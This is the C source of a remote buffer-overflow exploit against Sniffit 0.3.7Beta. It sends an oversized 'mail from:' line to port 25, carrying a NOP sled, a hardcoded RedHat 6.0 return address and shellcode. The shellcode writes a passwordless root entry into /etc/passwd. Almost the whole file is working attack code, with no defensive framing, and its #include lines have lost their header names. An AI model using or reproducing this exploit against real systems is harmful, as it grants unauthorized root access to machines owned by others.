/* Sniffit 0.3.7Beta Remote Exploit sniffit has to be running (-L mail) flag set for this to work. bug discovery by http://www.s0ftpj.org tested on RedHat 6.0 this will get you a root line in /etc/passwd -->snip... # tail -1 /etc/passwd n0ir::0:0:mr. noir:/:/bin/sh <--end... greetz: gov-boi, CronoS, dustdvl, calaz, everyone at gsu-linux exploit code by noir@gsu.linux.org.tr | noir@olympos.org http://www.olympos.org [RET]{NOP}[shellcode] 3 May 2000 */ #include #include #include #include #include #include #include #include #include unsigned char shellcode[]= { 0xeb, 0x03, 0x5f, 0xeb, 0x05, 0xe8, 0xf8, 0xff, 0xff, 0xff, 0x31, 0xdb, 0xb3, 0x35, 0x01, 0xfb, 0x30, 0xe4, 0x88, 0x63, 0x0b, 0x31, 0xc9, 0x66, 0xb9, 0x01, 0x04, 0x31, 0xd2, 0x66, 0xba, 0xa4, 0x01, 0x31, 0xc0, 0xb0, 0x05, 0xcd, 0x80, 0x89, 0xc3, 0x31, 0xc9, 0xb1, 0x5b, 0x01, 0xf9, 0x31, 0xd2, 0xb2, 0x1d, 0x31, 0xc0, 0xb0, 0x04, 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0xcd, 0x80, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x01, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x6e, 0x30, 0x69, 0x72, 0x3a, 0x3a, 0x30, 0x3a, 0x30, 0x3a, 0x6d, 0x72, 0x2e, 0x20, 0x6e, 0x6f, 0x69, 0x72, 0x3a, 0x2f, 0x3a, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20 }; int resolv(char *hname, struct in_addr *addr); /*#define RET 0xaabbccdd marker lvalue*/ #define RET 0xbfff5ba3 /*RedHat 6.0 (hedwig)*/ #define NOP 0x90 int main(int argc, char *argv[]) { int fd; int i, l; int align = 11; unsigned long eip = RET, addr = 0, offset = 0; unsigned char ovf[812]; struct sockaddr_in servaddr; if (argc < 2){ fprintf(stderr,"Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n"); fprintf(stderr,"Olympos Security Team http://www.olympos.org\n"); fprintf(stderr,"bug discovery by FuSyS of s0ftpj.org\n"); fprintf(stderr,"\nUsage: %s [offset]\n\n",argv[0]); exit(0); } if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){ perror("socket"); exit(-1); } bzero(&servaddr, sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_port = htons(25); if(!resolv(argv[1], &servaddr.sin_addr)){ herror("gethostbyname"); exit(-1); } if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){ perror("connect"); exit(-1); } printf("Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n"); printf("Olympos Security Team http://www.olympos.org\n"); printf("bug discovery by FuSyS of s0ftpj.org\n"); if(argv[2]) offset = atoi(argv[2]); addr = eip + offset; memset(ovf, NOP, sizeof(ovf)); for( i = 0 ; i < align; i++) ovf[i] = 0x41; for( i = align; i < strlen(ovf) ; i+=4) *((long *) &ovf[i]) = addr; for( i = 230; i < strlen(ovf); i++) ovf[i] = 0x90; for( i = 603, l = 0; l < strlen(shellcode); i++, l++) ovf[i] = shellcode[l]; printf("eip: 0x%lx\n", addr); memcpy(ovf, "mail from:",10); write(fd, ovf, strlen(ovf)); write(fd, "\r\n\n", 3); return 0; } int resolv(char *hname, struct in_addr *addr) { struct hostent *hp; if(inet_aton(hname, addr)) return 1; if ( (hp = gethostbyname(hname)) == NULL) return 0; memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr)); return 1; }